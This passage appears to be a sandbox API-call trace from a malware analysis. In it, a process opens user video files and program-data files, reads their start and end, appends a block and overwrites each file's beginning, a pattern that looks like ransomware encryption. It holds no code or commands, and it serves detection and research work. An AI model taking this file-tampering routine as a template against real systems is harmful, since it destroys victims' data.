lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x9709 [0188.015] ReadFile (in: hFile=0x214, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0188.015] SetFilePointer (in: hFile=0x214, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x9709 [0188.015] WriteFile (in: hFile=0x214, lpBuffer=0x1ebfe08*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebfe08*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0188.015] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0188.015] WriteFile (in: hFile=0x214, lpBuffer=0x25a56a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0188.016] CloseHandle (hObject=0x214) returned 1 [0188.016] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\iFq7qSEHvHQN WmzmOe\\EoH7mBquEvOKApaV8\\A0pSyygjr-NMEZhrScV.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ifq7qsehvhqn wmzmoe\\eoh7mbquevokapav8\\a0psyygjr-nmezhrscv.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x214 [0188.017] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0188.017] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x9e44 [0188.017] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0188.017] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0188.017] ReleaseMutex (hMutex=0x168) returned 1 [0188.017] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="A0pSyygjr-NMEZhrScV.swf", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0188.017] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="A0pSyygjr-NMEZhrScV.swf", cchWideChar=23, lpMultiByteStr=0x1f88b2c, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A0pSyygjr-NMEZhrScV.swf", lpUsedDefaultChar=0x0) returned 23 [0188.017] ReadFile (in: hFile=0x214, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0188.018] SetFilePointer (in: hFile=0x214, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x8e44 [0188.019] ReadFile (in: hFile=0x214, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0188.019] SetFilePointer (in: hFile=0x214, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x8e44 [0188.019] WriteFile (in: hFile=0x214, lpBuffer=0x1ebfe08*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebfe08*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0188.020] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0188.020] WriteFile (in: hFile=0x214, lpBuffer=0x25a56a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0188.020] CloseHandle (hObject=0x214) returned 1 [0188.021] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\iFq7qSEHvHQN WmzmOe\\EoH7mBquEvOKApaV8\\YlkHDqN3t8.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ifq7qsehvhqn wmzmoe\\eoh7mbquevokapav8\\ylkhdqn3t8.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x214 [0188.022] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0188.022] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x14fab [0188.022] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0188.022] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0188.022] ReleaseMutex (hMutex=0x168) returned 1 [0188.022] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YlkHDqN3t8.flv", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0188.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YlkHDqN3t8.flv", cchWideChar=14, lpMultiByteStr=0x1f7352c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YlkHDqN3t8.flv", lpUsedDefaultChar=0x0) returned 14 [0188.023] ReadFile (in: hFile=0x214, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0188.084] SetFilePointer (in: hFile=0x214, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x13fab [0188.084] ReadFile (in: hFile=0x214, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0188.085] SetFilePointer (in: hFile=0x214, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x13fab [0188.085] WriteFile (in: hFile=0x214, lpBuffer=0x1ebfe08*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebfe08*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0188.086] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0188.086] WriteFile (in: hFile=0x214, lpBuffer=0x25a56a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0188.086] CloseHandle (hObject=0x214) returned 1 [0188.087] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\iFq7qSEHvHQN WmzmOe\\_ZlYUd2JJwlU_wHf\\MHPoCsRQ_HoH.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ifq7qsehvhqn wmzmoe\\_zlyud2jjwlu_whf\\mhpocsrq_hoh.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x214 [0188.142] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0188.142] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x18631 [0188.142] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0188.143] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0188.143] ReleaseMutex (hMutex=0x168) returned 1 [0188.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MHPoCsRQ_HoH.flv", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0188.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MHPoCsRQ_HoH.flv", cchWideChar=16, lpMultiByteStr=0x1f88b2c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MHPoCsRQ_HoH.flv", lpUsedDefaultChar=0x0) returned 16 [0188.143] ReadFile (in: hFile=0x214, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0188.144] SetFilePointer (in: hFile=0x214, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x17631 [0188.144] ReadFile (in: hFile=0x214, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0188.145] SetFilePointer (in: hFile=0x214, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x17631 [0188.145] WriteFile (in: hFile=0x214, lpBuffer=0x1ebfe08*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebfe08*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0188.145] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0188.145] WriteFile (in: hFile=0x214, lpBuffer=0x25a56a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0188.146] CloseHandle (hObject=0x214) returned 1 [0188.146] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sqbgHDamn\\81-YS9WF.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\sqbghdamn\\81-ys9wf.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x214 [0188.147] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0188.147] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x9891 [0188.147] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0188.147] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0188.147] ReleaseMutex (hMutex=0x168) returned 1 [0188.147] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="81-YS9WF.swf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0188.147] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="81-YS9WF.swf", cchWideChar=12, lpMultiByteStr=0x1f7352c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="81-YS9WF.swf", lpUsedDefaultChar=0x0) returned 12 [0188.147] ReadFile (in: hFile=0x214, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0188.148] SetFilePointer (in: hFile=0x214, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x8891 [0188.149] ReadFile (in: hFile=0x214, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0188.149] SetFilePointer (in: hFile=0x214, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x8891 [0188.149] WriteFile (in: hFile=0x214, lpBuffer=0x1ebfe08*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebfe08*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0188.149] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0188.149] WriteFile (in: hFile=0x214, lpBuffer=0x25a56a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0188.150] CloseHandle (hObject=0x214) returned 1 [0188.150] CreateFileW (lpFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata" (normalized: "c:\\users\\all users\\adobe\\acrobat\\10.0\\replicate\\security\\directories.acrodata"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x214 [0188.151] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0188.151] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x767 [0188.151] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0188.151] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0188.151] ReleaseMutex (hMutex=0x168) returned 1 [0188.151] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="directories.acrodata", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0188.151] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="directories.acrodata", cchWideChar=20, lpMultiByteStr=0x1f88b2c, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="directories.acrodata", lpUsedDefaultChar=0x0) returned 20 [0188.151] ReadFile (in: hFile=0x214, lpBuffer=0x25a56c8, nNumberOfBytesToRead=0x767, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a56c8*, lpNumberOfBytesRead=0x2e9f2bc*=0x767, lpOverlapped=0x0) returned 1 [0188.153] CloseHandle (hObject=0x214) returned 1 [0188.153] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.H1D" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_mvalidator.h1d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x214 [0188.154] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0188.154] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x3944 [0188.154] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0188.154] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0188.154] ReleaseMutex (hMutex=0x168) returned 1 [0188.154] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Help_MValidator.H1D", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0188.154] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Help_MValidator.H1D", cchWideChar=19, lpMultiByteStr=0x1f88b2c, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Help_MValidator.H1D", lpUsedDefaultChar=0x0) returned 19 [0188.155] ReadFile (in: hFile=0x214, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0188.157] SetFilePointer (in: hFile=0x214, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x2944 [0188.157] ReadFile (in: hFile=0x214, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0188.197] SetFilePointer (in: hFile=0x214, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x2944 [0188.197] WriteFile (in: hFile=0x214, lpBuffer=0x1ebfe08*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebfe08*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0188.197] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0188.197] WriteFile (in: hFile=0x214, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0188.198] CloseHandle (hObject=0x214) returned 1 [0188.198] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\MF\\Active.GRL" (normalized: "c:\\users\\all users\\microsoft\\mf\\active.grl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x214 [0188.199] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0188.199] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x3a7c [0188.200] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0188.200] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0188.200] ReleaseMutex (hMutex=0x168) returned 1 [0188.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Active.GRL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0188.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Active.GRL", cchWideChar=10, lpMultiByteStr=0x1f7352c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Active.GRL", lpUsedDefaultChar=0x0) returned 10 [0188.200] ReadFile (in: hFile=0x214, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0188.202] SetFilePointer (in: hFile=0x214, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x2a7c [0188.202] ReadFile (in: hFile=0x214, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0188.203] SetFilePointer (in: hFile=0x214, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x2a7c [0188.203] WriteFile (in: hFile=0x214, lpBuffer=0x1ebfe08*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebfe08*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0188.204] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0188.204] WriteFile (in: hFile=0x214, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0188.204] CloseHandle (hObject=0x214) returned 1 [0188.205] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.excel.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x214 [0188.205] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0188.205] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x6ce [0188.206] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0188.206] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0188.206] ReleaseMutex (hMutex=0x168) returned 1 [0188.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.EXCEL.14.1033.hxn", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0188.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.EXCEL.14.1033.hxn", cchWideChar=20, lpMultiByteStr=0x1f88b2c, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.EXCEL.14.1033.hxn", lpUsedDefaultChar=0x0) returned 20 [0188.206] ReadFile (in: hFile=0x214, lpBuffer=0x2663858, nNumberOfBytesToRead=0x6ce, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesRead=0x2e9f2bc*=0x6ce, lpOverlapped=0x0) returned 1 [0188.207] CloseHandle (hObject=0x214) returned 1 [0188.208] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn" (normalized: 